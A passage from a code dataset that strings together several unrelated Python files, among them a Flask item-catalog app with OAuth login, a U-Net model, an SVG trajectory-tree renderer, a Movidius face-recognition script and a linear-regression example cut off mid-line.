offspring_crossover[idx,4]+random_value\n return offspring_crossover\n","sub_path":"ANN_Optimization/ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"479119614","text":"from flask import request, redirect, url_for, render_template, flash\r\nfrom flask import make_response\r\nfrom my_app import app\r\nfrom models import Category, Item\r\nfrom my_app.database_operations import DatabaseOperations\r\nimport jinja2, json, os, httplib2, random, string, requests\r\nfrom functools import wraps\r\nfrom flask import session as login_session\r\nfrom my_app.auth.authentication import *\r\nfrom flask_login import LoginManager, UserMixin, login_user, logout_user,\\\r\n current_user\r\n\r\nlm = LoginManager(app)\r\nlm.login_view = 'index'\r\n@lm.user_loader\r\ndef load_user(id):\r\n return db.getUserById(int(id))\r\n\r\ntemplate_directory = os.path.join(os.getcwd(), 'templates')\r\njinja_environment = \\\r\n jinja2.Environment(loader=jinja2.FileSystemLoader(template_directory),\r\n autoescape=True)\r\n\r\ndb = DatabaseOperations()\r\n\r\ndef login_required(f):\r\n @wraps(f)\r\n def login_check(*args, **kwargs):\r\n if not current_user.is_anonymous:\r\n return f(*args, **kwargs)\r\n else:\r\n flash(\"You have to be logged in to access this page\")\r\n return redirect('/login')\r\n return login_check\r\n\r\n\r\n@app.route('/')\r\n@app.route('/index')\r\ndef index():\r\n categories = db.getCategories()\r\n latest_items = db.getLatestItems(10)\r\n cat_items = {}\r\n for item in latest_items:\r\n cat_items[item.title] = db.getCategoryForItem(item)\r\n return render_template('index.html', categories=categories,\r\n latest_items=latest_items, cat_items=cat_items)\r\n\r\n\r\n@app.route('/category/')\r\ndef showItems(id):\r\n category = db.getCategoryById(id=id)\r\n if not category:\r\n flash(\"The Category you requested does not exist\")\r\n return redirect('/')\r\n itemCount = db.getNumberOfItemsPerCategory(category.id)\r\n items = db.getItemsForCategory(category.id)\r\n return render_template('items.html', category=category, items=items,\r\n itemCount=itemCount)\r\n\r\n\r\n@app.route('/category/item/')\r\ndef item(id):\r\n item = db.getItemById(id=id)\r\n if not item:\r\n flash(\"Item you asked for does not exist.\")\r\n return redirect('/')\r\n categoryName = db.getCategoryForItem(item)\r\n return render_template('item.html', item=item, categoryName=categoryName)\r\n\r\n\r\n\"\"\"\r\n Routes for adding, updating and deleting items\r\n Also a route for signing in as user\r\n And a route for Logging in with third party oauth\r\n\"\"\"\r\n@app.route('/item/add', methods=['GET', 'POST'])\r\n@login_required\r\ndef addItem():\r\n if request.method == 'GET':\r\n categories = db.getCategories()\r\n params = {}\r\n return render_template('newItem.html', categories=categories,\r\n params=params)\r\n if request.method == 'POST':\r\n\r\n title = request.form.get('title')\r\n description = request.form.get('description')\r\n category = request.form.get('category')\r\n\r\n categories = db.getCategories()\r\n params = {'title': title, 'description': description,\r\n 'category': category}\r\n item = item_request(title, description, category, False)\r\n if item is None:\r\n return render_template('newItem.html', categories=categories,\r\n params=params)\r\n if db.addItem(item):\r\n flash(\"Item was added succesfully!\")\r\n return redirect('/')\r\n else:\r\n flash(\"Something went wrong adding item.\")\r\n return render_template('newItem.html', categories=categories,\r\n params=params)\r\n\r\n\r\ndef item_request(title, description, category, edit):\r\n \"\"\"\r\n This is a helper method for both adding and\r\n editing an item, so there is no duplicate code.\r\n \"\"\"\r\n creator_id = current_user.social_id\r\n categories = db.getCategories()\r\n params = {'title': title, 'description': description,\r\n 'category': category}\r\n\r\n if not title:\r\n flash(\"A title is required.\")\r\n return None\r\n\r\n if not description:\r\n flash(\"A description is required.\")\r\n return None\r\n\r\n existingCategories = db.getExistingCategories()\r\n if not int(category) in existingCategories:\r\n flash(\"This is a non existing category.\")\r\n return None\r\n\r\n # title must be unique in this category but not for editing.\r\n if not edit:\r\n titles = db.getCategoryTitles(category)\r\n if title in titles:\r\n flash(\"Existing title in this category: try another title.\")\r\n return None\r\n\r\n if not creator_id:\r\n flash(\"Sorry, the session could not find logged in user.\")\r\n return None\r\n\r\n item = Item(title, description, category, creator_id)\r\n return item\r\n\r\n\r\n@app.route('/category/item//delete', methods=['GET', 'POST'])\r\n@login_required\r\ndef deleteItem(id):\r\n\r\n item = db.getItemById(id=id)\r\n creator = item.creator\r\n user_id = current_user.social_id\r\n\r\n if item.creator != user_id:\r\n flash(\"Sorry you have to be the creator of an item to delete it.\")\r\n return redirect('/')\r\n if not item:\r\n flash('This item does not exist.')\r\n return redirect('/')\r\n\r\n if request.method == 'GET':\r\n return render_template('deleteItem.html', item=item)\r\n if request.method == 'POST':\r\n if request.form.get('action') != \"Yes Delete\":\r\n return redirect('/')\r\n user = current_user\r\n if db.deleteItem(item.id, user):\r\n flash(\"The item has been deleted succesfully.\")\r\n else:\r\n flash(\"The item could not be deleted.\")\r\n return redirect('/')\r\n\r\n\r\n# you need to be logged in\r\n@app.route('/item//edit', methods=['GET', 'POST'])\r\n@login_required\r\ndef editItem(id):\r\n item = db.getItemById(id=id)\r\n creator = db.getItemCreator(id=id)\r\n user_id = current_user.social_id\r\n\r\n params = {}\r\n if creator != user_id:\r\n flash(\"Sorry you need to be the creator of an item to edit it\")\r\n return redirect('/')\r\n if not item:\r\n flash('This item does not exist')\r\n return redirect('/')\r\n\r\n if request.method == 'GET':\r\n # present a form for editing items\r\n categories = db.getCategories()\r\n return render_template('editItem.html', categories=categories,\r\n params=params, item=item)\r\n\r\n if request.method == 'POST':\r\n\r\n title = request.form.get('title')\r\n description = request.form.get('description')\r\n category = request.form.get('category')\r\n categories = db.getCategories()\r\n\r\n params = {'title': title, 'description': description,\r\n 'category': category}\r\n\r\n new_item = item_request(title, description, category, True)\r\n\r\n if not new_item:\r\n flash(\"Item could not be updated.\")\r\n return render_template('editItem.html', categories=categories,\r\n params=params, item=item)\r\n\r\n if db.updateItem(item.id, new_item, current_user):\r\n flash(\"Succesfully edited item.\")\r\n return redirect('/')\r\n return render_template('editItem.html', categories=categories,\r\n params=params, item=item)\r\n\r\n\r\n@app.route('/categories.json/')\r\ndef categoriesJson():\r\n categories = db.getSerializedCategories()\r\n return categories\r\n\r\n\r\n@app.route('/category//items.json/')\r\ndef itemsJson(id):\r\n items = db.getSerializedItemsForCategory(id)\r\n return items\r\n\r\n\r\n@app.route('/category/item//item.json/')\r\ndef itemJson(id):\r\n item = db.getSerializedItem(id)\r\n return item\r\n\r\n\r\n@app.route('/login')\r\ndef login():\r\n # Create anti-forgery state token\r\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\\\r\n for x in xrange(32))\r\n login_session['state'] = state\r\n return render_template('login.html', STATE=state)\r\n\r\n\r\n@app.route('/logout')\r\ndef logout():\r\n logout_user()\r\n return redirect(url_for('index'))\r\n\r\n\r\n@app.route('/authorize/')\r\ndef oauth_authorize(provider):\r\n if not current_user.is_anonymous:\r\n return redirect(url_for('index'))\r\n oauth = OAuthSignIn.get_provider(provider)\r\n return oauth.authorize()\r\n\r\n\r\n@app.route('/callback/')\r\ndef oauth_callback(provider):\r\n if not current_user.is_anonymous:\r\n return redirect(url_for('index'))\r\n oauth = OAuthSignIn.get_provider(provider)\r\n social_id, username, email = oauth.callback()\r\n if social_id is None:\r\n flash('Authentication failed.')\r\n return redirect(url_for('index'))\r\n user = db.getUserBySocialId(social_id=social_id)\r\n if not user:\r\n user = db.addUser(social_id=social_id, name=username, email=email)\r\n login_user(user, True)\r\n flash('logged in with: ' + provider + ' as ' + username)\r\n return redirect(url_for('index'))\r\n","sub_path":"my_app/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"599142733","text":"#!/usr/bin/env python\nfrom sys import version_info\nfrom setuptools import setup, find_packages\n\ntests_require = ['mock']\n\nif version_info < (2, 7):\n tests_require.append('unittest2')\n\nsetup(name='gevent-kafka',\n version='0.3.1',\n description='Apache Kafka bindings for Gevent',\n author='Johan Rydberg',\n author_email='johan.rydberg@gmail.com',\n url='https://github.com/edgeware/gevent-kafka',\n packages=find_packages(),\n test_suite='gevent_kafka.test',\n install_requires=[\n 'gevent>=1.0.1',\n 'kazoo>=1.3.1'\n ],\n tests_require=tests_require)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"541155241","text":"\"\"\"\nThis is based on:\n https://github.com/facebookresearch/fastMRI\n\"\"\"\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom pyssr.core.config import cfg\n\n\nclass ConvBlock(nn.Module):\n \"\"\"\n A Convolutional Block that consists of two convolution layers each followed by\n instance normalization, LeakyReLU activation and dropout.\n \"\"\"\n\n def __init__(self, in_chans, out_chans, drop_prob):\n \"\"\"\n Args:\n in_chans (int): Number of channels in the input.\n out_chans (int): Number of channels in the output.\n drop_prob (float): Dropout probability.\n \"\"\"\n super().__init__()\n\n self.in_chans = in_chans\n self.out_chans = out_chans\n self.drop_prob = drop_prob\n\n self.layers = nn.Sequential(\n nn.Conv2d(in_chans, out_chans, kernel_size=3, padding=1, bias=False),\n nn.InstanceNorm2d(out_chans),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n nn.Dropout2d(drop_prob),\n nn.Conv2d(out_chans, out_chans, kernel_size=3, padding=1, bias=False),\n nn.InstanceNorm2d(out_chans),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n nn.Dropout2d(drop_prob)\n )\n\n def forward(self, input):\n \"\"\"\n Args:\n input (torch.Tensor): Input tensor of shape [batch_size, self.in_chans, height, width]\n Returns:\n (torch.Tensor): Output tensor of shape [batch_size, self.out_chans, height, width]\n \"\"\"\n return self.layers(input)\n\n def __repr__(self):\n return f'ConvBlock(in_chans={self.in_chans}, out_chans={self.out_chans}, ' \\\n f'drop_prob={self.drop_prob})'\n\n\nclass TransposeConvBlock(nn.Module):\n \"\"\"\n A Transpose Convolutional Block that consists of one convolution transpose layers followed by\n instance normalization and LeakyReLU activation.\n \"\"\"\n\n def __init__(self, in_chans, out_chans):\n \"\"\"\n Args:\n in_chans (int): Number of channels in the input.\n out_chans (int): Number of channels in the output.\n \"\"\"\n super().__init__()\n\n self.in_chans = in_chans\n self.out_chans = out_chans\n\n self.layers = nn.Sequential(\n nn.ConvTranspose2d(in_chans, out_chans, kernel_size=2, stride=2, bias=False),\n nn.InstanceNorm2d(out_chans),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n )\n\n def forward(self, input):\n \"\"\"\n Args:\n input (torch.Tensor): Input tensor of shape [batch_size, self.in_chans, height, width]\n Returns:\n (torch.Tensor): Output tensor of shape [batch_size, self.out_chans, height, width]\n \"\"\"\n return self.layers(input)\n\n def __repr__(self):\n return f'ConvBlock(in_chans={self.in_chans}, out_chans={self.out_chans})'\n\n\nclass UNet(nn.Module):\n \"\"\"\n PyTorch implementation of a U-Net model.\n This is based on:\n Olaf Ronneberger, Philipp Fischer, and Thomas Brox. U-net: Convolutional networks\n for biomedical image segmentation. In International Conference on Medical image\n computing and computer-assisted intervention, pages 234–241. Springer, 2015.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Args:\n in_chans (int): Number of channels in the input to the U-Net model.\n out_chans (int): Number of channels in the output to the U-Net model.\n num_chans (int): Number of output channels of the first convolution layer.\n num_pools (int): Number of down-sampling and up-sampling layers.\n drop_prob (float): Dropout probability.\n \"\"\"\n super().__init__()\n\n in_chans = cfg.MODEL.IN_CHANNELS\n out_chans = cfg.MODEL.IN_CHANNELS\n num_chans = cfg.UNET.NUM_CHANS\n num_pools = cfg.UNET.NUM_POOLS\n drop_prob = cfg.UNET.DROP_PROB\n\n self.in_chans = in_chans\n self.out_chans = out_chans\n self.num_chans = num_chans\n self.num_pools = num_pools\n self.drop_prob = drop_prob\n\n self.down_sample_layers = nn.ModuleList([ConvBlock(in_chans, num_chans, drop_prob)])\n ch = num_chans\n for i in range(num_pools - 1):\n self.down_sample_layers += [ConvBlock(ch, ch * 2, drop_prob)]\n ch *= 2\n self.conv = ConvBlock(ch, ch * 2, drop_prob)\n\n self.up_conv = nn.ModuleList()\n self.up_transpose_conv = nn.ModuleList()\n for i in range(num_pools - 1):\n self.up_transpose_conv += [TransposeConvBlock(ch * 2, ch)]\n self.up_conv += [ConvBlock(ch * 2, ch, drop_prob)]\n ch //= 2\n\n self.up_transpose_conv += [TransposeConvBlock(ch * 2, ch)]\n self.up_conv += [\n nn.Sequential(\n ConvBlock(ch * 2, ch, drop_prob),\n nn.Conv2d(ch, self.out_chans, kernel_size=1, stride=1),\n )]\n\n def forward(self, input):\n \"\"\"\n Args:\n input (torch.Tensor): Input tensor of shape [batch_size, self.in_chans, height, width]\n Returns:\n (torch.Tensor): Output tensor of shape [batch_size, self.out_chans, height, width]\n \"\"\"\n mean = input.detach().mean(dim=(2, 3), keepdim=True)\n output = input - mean\n stack = []\n\n # Apply down-sampling layers\n for i, layer in enumerate(self.down_sample_layers):\n output = layer(output)\n stack.append(output)\n output = F.avg_pool2d(output, kernel_size=2, stride=2, padding=0)\n\n output = self.conv(output)\n\n # Apply up-sampling layers\n for transpose_conv, conv in zip(self.up_transpose_conv, self.up_conv):\n downsample_layer = stack.pop()\n output = transpose_conv(output)\n\n # Reflect pad on the right/bottom if needed to handle odd input dimensions.\n padding = [0, 0, 0, 0]\n if output.shape[-1] != downsample_layer.shape[-1]:\n padding[1] = 1 # Padding right\n if output.shape[-2] != downsample_layer.shape[-2]:\n padding[3] = 1 # Padding bottom\n if sum(padding) != 0:\n output = F.pad(output, padding, \"reflect\")\n\n output = torch.cat([output, downsample_layer], dim=1)\n output = conv(output)\n\n return output + mean\n\n @staticmethod\n def complexity(cx):\n return cx\n","sub_path":"pyssr/models/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":6465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"540658412","text":"import threading\nimport time\n#线程共享全局变量\ng_num=100\ndef worker1(num):\n\tfor i in range(3):\n\t\tnum+=1\n\t\tprint('in worker1 g_num:%d'%num)\n\ndef worker2(num):\n\tprint('in worker2 g_num:%d'%num)\n\nprint('主线程,g_num:%d'%g_num)\n\nw1=threading.Thread(target=worker1,args=(g_num,))\nw1.start()\ntime.sleep(1)\n\nw2=threading.Thread(target=worker2,args=(g_num,))\nw2.start()\nprint('主线程,g_num:%d'%g_num)\n","sub_path":"python/Day9/10-线程传参2.py","file_name":"10-线程传参2.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"326401854","text":"import svgwrite\nimport os\n\nclass TreeRenderer(object):\n def __init__(self):\n self.start_x = 0\n self.start_y = 0\n self.scale_x = 24\n self.scale_y = 24\n self.scale_th = 24\n self.font_family = \"Futura\"\n self.font_size = 0.3\n self.document = None\n self.font_baseline_shift = +0.05\n self.stroke_width = 0.05\n self.horizontal_gap = 0.05\n self.min_x = 10000\n self.min_y = 10000\n self.max_x = -10000\n self.max_y = -10000\n\n self.shift_x = 0\n self.shift_y = 0\n self.height = 0\n self.width = 0\n\n self.obj = list()\n self.margin = 0\n self.zoom = 1.0\n\n def __getattr__(self, item):\n if item in ['block', 'shade', 'v_connection', 'h_connection', 'label']:\n # This will delay the execution of the draw commands until we know where to draw\n return self._delay(object.__getattribute__(self, 'draw_' + item))\n else:\n return object.__getattribute__(self, item)\n\n\n def _delay(self, func):\n def wrapper(*args, **kwargs):\n def fnc():\n return func(*args, **kwargs)\n\n return fnc\n\n return wrapper\n\n def add(self, obj):\n self.obj.append(obj)\n\n def pre(self, obj):\n self.obj.insert(0, obj)\n\n def _x(self, x):\n return self.start_x + self._w(x - self.shift_x)\n\n def _y(self, y):\n return self.start_y + self._h(y + self.shift_y)\n\n def _w(self, y):\n return self.scale_x * self.zoom * y\n\n def _h(self, y):\n return self.scale_y * self.zoom * y\n\n def _th(self, th):\n return self.scale_th * self.zoom * th\n\n def _xy(self, x, y):\n return (self._x(x), self._y(y))\n\n def _wh(self, w, h):\n return (self._w(w), self._h(h))\n\n def _xb(self, x, y):\n return (self._x(x), self._y(y + self.font_baseline_shift))\n\n\n def _pad(self, xy, wh):\n self.min_x = min(self.min_x, xy[0], xy[0] + wh[0])\n self.min_y = min(self.min_y, xy[1], xy[1] + wh[1])\n self.max_x = max(self.max_x, xy[0] + wh[0], xy[0])\n self.max_y = max(self.max_y, xy[1] + wh[1], xy[1])\n\n def draw_block(self, x,y, color = \"blue\", text = \"\", align=\"middle\", extend_right= True, extend_left = True, padding=None):\n document = self.document\n if padding is None:\n padding = self.horizontal_gap\n\n self._pad(self._xy(x - 0.5, y - 0.3), self._wh(1.0, 0.6))\n\n ret = []\n\n ret.append(document.rect(\n insert = self._xy(x - 0.5 + padding, y - 0.3),\n size = self._wh(1.0 - 2 * padding, 0.6),\n fill = color,\n ))\n if extend_left:\n ret.append(document.circle(\n center = self._xy(x - 0.5, y),\n r = self._w(padding),\n stroke_width = 0,\n stroke = color,\n fill = color\n ))\n if extend_right:\n ret.append(document.circle(\n center = (self._xy(x + 0.5, y)),\n r = self._w( padding),\n stroke_width = 0,\n stroke = color,\n fill = color\n ))\n ret.append(document.text(\n text = str(text)[:4],\n insert = self._xb(x, y),\n text_anchor = align,\n font_size = self._h(self.font_size),\n alignment_baseline = 'middle',\n font_family = self.font_family,\n fill = 'white'\n ))\n\n return ret\n\n def draw_shade(self, x, y, w, color, stroke_width = None):\n document = self.document\n if stroke_width is None:\n stroke_width = self.stroke_width\n\n self._pad(self._xy(x - 0.5, y - 0.35), self._wh(1.0, 0.7))\n\n return [document.rect(\n insert = self._xy(x - 0.5, y + 0.35),\n size = self._wh(w, 0.1),\n fill = color,\n stroke = color,\n stroke_width = self._th(stroke_width)\n )]\n\n def draw_shade_alt(self, x, y, w, color, stroke_width = None):\n document = self.document\n if stroke_width is None:\n stroke_width = self.stroke_width\n\n self._pad(self._xy(x - 0.5, y - 0.35), self._wh(1.0, 0.7))\n\n return [document.rect(\n insert = self._xy(x - 0.5, y - 0.35),\n size = self._wh(w, 0.7),\n fill = 'none',\n stroke = color,\n stroke_width = self._th(stroke_width)\n )]\n\n def draw_v_connection(self, x, y1, y2, color, stroke_width = None, padding = None):\n document = self.document\n if stroke_width is None:\n stroke_width = self.stroke_width\n if padding is None:\n padding = self.horizontal_gap\n\n self._pad(self._xy(x - 0.5 - stroke_width, y1), self._wh(2 * stroke_width, y2-y1))\n\n return [document.line(\n start = self._xy(x - 0.5, y1 + padding),\n end = self._xy(x - 0.5, y2 - padding),\n stroke_width = self._th(stroke_width),\n stroke = color,\n )]\n\n def draw_h_connection(self, x1, x2, y, color, stroke_width = None, padding = None):\n document = self.document\n if stroke_width is None:\n stroke_width = self.stroke_width\n if padding is None:\n padding = self.horizontal_gap\n\n self._pad(self._xy(x1, y - stroke_width), self._wh(x2-x1, 2 * stroke_width))\n\n return [document.line(\n start = self._xy(x1 + 0.5 + padding, y),\n end = self._xy(x2 - 0.5, y),\n stroke_width = self._th(stroke_width),\n stroke = color,\n )]\n\n def _text_align_to_int(self, s):\n if s == \"start\":\n return 1\n elif s == \"end\":\n return -1\n else:\n return 0\n\n def draw_label(self, x, y, w, text, align = \"middle\", color = \"black\", shift = 0.7):\n document = self.document\n\n self._pad(\n self._xy(x + shift * self._text_align_to_int(align), y),\n self._wh(w * self._text_align_to_int(align), 0.6)\n )\n\n return [document.text(\n text = str(text),\n insert = self._xb(x + shift * self._text_align_to_int(align), y),\n text_anchor = align,\n font_size = self._h(self.font_size),\n alignment_baseline = 'middle',\n font_family = self.font_family,\n fill = color\n )]\n\n def to_document(self):\n\n self.start_x = self.margin\n self.start_y = self.margin\n\n\n self.document = svgwrite.Drawing()\n self.document['width'] = str(self._width()) + 'px'\n self.document['height'] = str(self._height()) + 'px'\n\n for obj in self.obj:\n parts = obj()\n map(self.document.add, parts)\n\n# self.document.add(self.document.rect(\n# insert = (0, 0),\n# size = (self._width(), self._height()),\n# fill = 'none',\n# stroke = 'black'\n# ))\n\n\n return self.document\n\n def to_svg(self):\n doc = self.to_document()\n return doc.tostring()\n\n def to_html(self, svg = None):\n if svg is None:\n svg = self.to_svg()\n\n html = '' + svg + ''\n\n return html\n\n def _height(self):\n return self._h(self.height) + self.margin * 2\n\n def _width(self):\n return self._w(self.width) + self.margin * 2\n\n def write_html(self, file = 'tree.html'):\n with open(file, 'w') as f:\n f.write(self.to_html())\n\n def save_pdf(self, file='tree.pdf'):\n h = self._height()\n w = self._width()\n\n h_margin = 3.5\n v_margin = 3.5\n\n page_height =str(25.4 / 75.0 * h + v_margin)+'mm'\n page_width =str(25.4 / 75.0 * w + h_margin)+'mm'\n\n with open('tree_xxx.html', 'w') as f:\n f.write(self.to_html())\n\n f.closed\n\n bashCommand = \"wkhtmltopdf -l --page-width \" + page_width + \" --page-height \" + page_height + \" --disable-smart-shrinking -B 1mm -L 1mm -R 1mm -T 1mm tree_xxx.html \" + file\n os.system(bashCommand)\n\n def clear(self):\n self.obj = []\n\n\n\nclass PathTreeBuilder(object):\n def __init__(self, storage, op=None, states = None):\n self.rejected = False\n self.p_x = dict()\n self.p_y = dict()\n self.obj = list()\n self.storage = storage\n self.renderer = TreeRenderer()\n self.op = op\n if states is None:\n states = {}\n self.states = states\n\n @staticmethod\n def construct_heritage(storage, sample):\n list_of_samples = []\n\n samp = sample\n\n while len(samp.details.inputs) > 0:\n if len(samp.details.inputs) == 1:\n # just one sample so use this\n list_of_samples.append(samp)\n samp = samp.details.inputs[0]\n else:\n # if there are more than one input choose the most useful one\n # e.g. for ReplicaExchange the initial one\n found_one = False\n for input in samp.details.inputs:\n if input.trajectory == list_of_samples[-1].trajectory:\n # got it\n found_one = True\n samp = input\n break\n\n if not found_one:\n break\n\n # reverse to get origin first\n return [samp for samp in reversed(list_of_samples)]\n\n def from_samples(self, samples, clear=True):\n if len(samples) == 0:\n # no samples, nothing to do\n # TODO: Raise an exception or just ignore and don't output anything?\n return\n\n p_x = dict()\n p_y = dict()\n\n if clear:\n self.renderer.clear()\n\n t_count = 0\n shift = 0\n\n lightcolor = \"gray\"\n\n for sample in samples:\n if hasattr(sample.details, 'start_point'):\n old_traj = sample.details.start_point.trajectory\n old_index = sample.details.start_point.index\n old_conf = old_traj[old_index].configuration\n\n new_traj = sample.details.final_point.trajectory\n new_index = sample.details.final_point.index\n new_conf = new_traj[new_index].configuration\n\n accepted = sample.details.accepted\n\n if sample.trajectory is new_traj or self.rejected:\n t_count += 1\n if not old_conf in p_x:\n for pos, snapshot in enumerate(old_traj):\n conf = snapshot.configuration\n p_x[conf] = pos\n p_y[conf] = t_count\n\n pos_x = p_x[conf]\n pos_y = p_y[conf]\n if self.op is not None:\n self.renderer.add(self.renderer.block(pos_x, pos_y, \"black\", self.op(snapshot)))\n else:\n self.renderer.add(self.renderer.block(pos_x, pos_y, \"black\", \"\"))\n\n self.renderer.add(\n self.renderer.label(0, t_count, 1, str(self.storage.idx(new_traj)) + 'b', align='end',color='black')\n )\n\n t_count += 1\n\n shift = p_x[old_conf] - new_index\n\n\n fontcolor = \"black\"\n\n draw_okay = False\n\n mover_name = ''\n\n if hasattr(sample.details, 'mover'):\n mover_name = sample.details.mover.name\n\n if mover_name == \"BackwardShootMover\":\n color = \"green\"\n if not accepted:\n color = lightcolor\n fontcolor = lightcolor\n self.renderer.add(\n self.renderer.v_connection(shift + new_index, p_y[old_conf], t_count, color)\n )\n self.renderer.add(\n self.renderer.label(shift, t_count, 1, str(self.storage.idx(new_traj)) + 'b', align='end',color=fontcolor)\n )\n draw_okay = True\n elif mover_name == 'ForwardShootMover':\n color = \"red\"\n if not accepted:\n color = lightcolor\n fontcolor = lightcolor\n self.renderer.add(\n self.renderer.v_connection(shift + new_index + 1, p_y[old_conf], t_count, color)\n )\n self.renderer.add(\n self.renderer.label(shift + len(new_traj) - 1, t_count, 1, str(self.storage.idx(new_traj)) + 'f', align='start',color=fontcolor)\n )\n draw_okay = True\n\n if not accepted:\n color = lightcolor\n\n if draw_okay:\n for pos, snapshot in enumerate(new_traj):\n conf = snapshot.configuration\n if not conf in p_y:\n p_y[conf] = t_count\n p_x[conf] = shift + pos\n\n pos_x = p_x[conf]\n pos_y = p_y[conf]\n if self.op is not None:\n self.renderer.add(self.renderer.block(pos_x, pos_y, color, self.op(snapshot)))\n else:\n self.renderer.add(self.renderer.block(pos_x, pos_y, color, \"\"))\n\n self.p_x = p_x\n self.p_y = p_y\n\n min_x, max_x = self._get_min_max(self.p_x)\n min_y, max_y = self._get_min_max(self.p_y)\n\n self.renderer.shift_x = min_x - 1.5\n self.renderer.shift_y = 0\n self.renderer.height = max_y - min_y + 2.0\n self.renderer.width = max_x - min_x + 3.0\n\n op_names = { arg[0] : arg[1] for arg in self.states }\n ops = {op : self.storage.collectivevariable.load(op) for op in op_names.keys() }\n\n matrix = self._to_matrix()\n\n for y in range(0, max_y - min_y + 1):\n rr = { op_name : None for op_name in op_names.keys() }\n yp = y + min_y\n for x in range(0, (max_x - min_x + 1)):\n xp = x + min_x\n for r in rr:\n op = ops[r]\n if matrix[y][x] is not None and bool(op(matrix[y][x])):\n if rr[r] is None:\n rr[r] = xp\n else:\n if rr[r] is not None:\n self.renderer.pre(\n self.renderer.shade(rr[r], yp, xp - rr[r], op_names[r])\n )\n rr[r] = None\n\n for r in rr:\n if rr[r] is not None:\n self.renderer.pre(\n self.renderer.shade(rr[r], yp, xp - rr[r] + 1, op_names[r])\n )\n\n\n\n def _get_min_max(self, d):\n return min(d.values()), max(d.values())\n\n def _to_matrix(self):\n min_x, max_x = self._get_min_max(self.p_x)\n min_y, max_y = self._get_min_max(self.p_y)\n\n matrix = [[None] * (max_x - min_x + 1) for n in range(max_y - min_y + 1)]\n\n for s in self.p_x:\n px = self.p_x[s]\n py = self.p_y[s]\n matrix[py - min_y][px - min_x] = s\n\n return matrix","sub_path":"openpathsampling/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":15842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202098391","text":"#! /usr/bin/env python\n\nfrom mvnc import mvncapi as mvnc\nimport numpy, cv2\nimport sys, os\nimport cPickle as pickle \nimport utilities\nimport tensorflow as tf\nimport openface\n\ncurr = os.getcwd()\n\nGRAPH_FILENAME = \"facenet_celeb_ncs.graph\"\nFACE_MATCH_THRESHOLD = 1.2\n\nDLIB_FACE_PREDICTOR = \"shape_predictor_68_face_landmarks.dat\"\n\ngraph = None\nmodel = None\nalign = None\n\ndef setup(gpu_memory_fraction=0.25):\n \n global graph, model, align\n\n print('Loading NCS graph')\n\n devices = mvnc.EnumerateDevices()\n if len(devices) == 0:\n print('No NCS devices found')\n quit()\n\n # Pick the first stick to run the network\n device = mvnc.Device(devices[0])\n\n # Open the NCS\n device.OpenDevice()\n\n # The graph file that was created with the ncsdk compiler\n graph_file_name = GRAPH_FILENAME\n\n # read in the graph file to memory buffer\n with open(graph_file_name, mode='rb') as f:\n graph_in_memory = f.read()\n\n # create the NCAPI graph instance from the memory buffer containing the graph file.\n graph = device.AllocateGraph(graph_in_memory)\n\n with open('model.pkl', 'rb') as mod:\n model = pickle.load(mod)\n\n align = openface.AlignDlib(DLIB_FACE_PREDICTOR)\n\ndef run(input_image):\n\n if (graph == None or model == None or align == None):\n print(\"Run setup function once first\")\n return []\n\n infer_image = cv2.imread(input_image)\n input_vector = utilities.run_inference(infer_image, graph, align)\n match = utilities.run_image(model, input_vector)\n # os.remove(input_image)\n return [match]\n\nif __name__ == \"__main__\":\n #print(run(sys.argv[1]))\n setup()\n","sub_path":"Demo/Final/faceRecognition.py","file_name":"faceRecognition.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"414022382","text":"# A multiple linear regression algorithm is the same as a normal linear regression, except we have multiple input variables (features)\n\n# Importing libraries\nimport numpy as np\nimport pandas as pd\n\n# Reading data\n# var1, var2, var3 are the variables of interest in our dataset\ndf = pd.read_csv(\"\")\nV1 = df[\"var1\"].values\nV2 = df[\"var2\"].values\nV3 = df[\"var3\"].values\n\n# We will optimize our cost function using the gradient descent algorithm. Here we set this up\nn = len(V1)\nx0 = np.ones(n)\nX = np.array([x0, V1, V2]).T\n# Starting coefficients\nB = np.array([0,0,0])\nY = np.array(V3)\nalpha = 0.0001\n\n# Now defining our cost function\ndef cost_function(X, Y, B):\n n = len(Y)\n J = np.sum((X.dot(B)-Y)**2)/(2*n)\n return J\n\n# We can now define our gradient descent function\ndef gradient_descent(X, Y, B, alpha, iterations):\n cost_history = [0] * iterations\n n = len(Y)\n for iteration in range(iterations):\n # Hypothesis Values\n h = X.dot(B)\n # Difference b/w Hypothesis and Actual Y\n loss = h - Y\n # Gradient Calculation\n gradient = X.T.dot(loss) / n\n # Changing Values of B using Gradient\n B = B - alpha * gradient\n # New Cost Value\n cost = cost_function(X, Y, B)\n cost_history[iteration] = cost\n\n return B, cost_history\n\n# Having now defined our gradient descent and cost function we can compute the final value of B\nnewB, cost_history = gradient_descent(X, Y, B, alpha, 100000)\nprint(newB)\nprint(cost_history[-1])\n\n# We can now evaluate our model accuracy using RMSE and R2 score\n\nY_pred = X.dot(newB)\n\n# RMSE\ndef rmse(Y, Y_pred):\n rmse = np.sqrt(sum((Y - Y_pred) ** 2) / len(Y))\n return rmse\n\n# R2 Score\ndef r2_score(Y, Y_pred):\n mean_y = np.mean(Y)\n ss_tot = sum((Y - mean_y) ** 2)\n ss_res = sum((Y - Y_pred) ** 2)\n r2 = 1 - (ss_res / 